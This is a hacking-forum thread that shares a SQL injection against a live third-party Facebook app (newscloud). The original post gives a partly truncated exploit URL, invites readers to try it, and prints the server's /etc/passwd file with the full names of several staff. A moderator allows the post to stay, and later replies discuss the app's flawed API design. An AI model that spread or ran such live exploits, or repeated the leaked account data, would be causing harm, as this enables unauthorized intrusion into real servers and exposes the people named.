-
Facebook SQL Injection
**t34b4g5's Edit: I am allowing this thread to remain, see post below :)**
I'm not sure if I'm allowed to post this here; if this is against the rules, just remove the thread.
A team member discovered this a few weeks ago and it still seems to be unpatched
Be my guest and play a little with them; a site as big as Facebook should be aware of security, hopefully their box is hardened.
***Click at your own Risk***
http://apps.facebook.com/newscloud/?...737764%29,10--
***Click at your own Risk***
Code:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash
jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
Debian-exim:x:102:104::/var/spool/exim4:/bin/false
statd:x:103:65534::/var/lib/nfs:/bin/false
identd:x:104:65534::/var/run/identd:/bin/false
adam:x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash
rick:x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash
russell:x:1005:1005:Russell Branca,,,:/home/russell:/bin/bash
daniel:x:1006:1006:Daniel MacDonald,,,:/home/daniel:/bin/bash
postfix:x:105:106::/var/spool/postfix:/bin/false
-
Greetz..
Nice thread, wish there were more types of threads like this being posted. :)
Anyhow, I am letting this thread stay. :) Simply because these aren't the freshest PoCs floating atm. ;)
So until they are rendered useless, don't be silly and get yourself raided by the FBI'z :halo:
-
Actually, what you've found is an injection in a third-party app on Facebook:
http://developers.facebook.com/
apps.facebook.com is the domain name, but that's not their data.
-
Considering what the third-party app is (newscloud), it doesn't really surprise me.
If I remember correctly (it's been a while since I looked at it), there is a problem with the Facebook API that allows any member to post their own information. Instead of setting it up like the members are contributors, it is set up like they are members, so they "need" direct access to the database. Even if Facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on Facebook.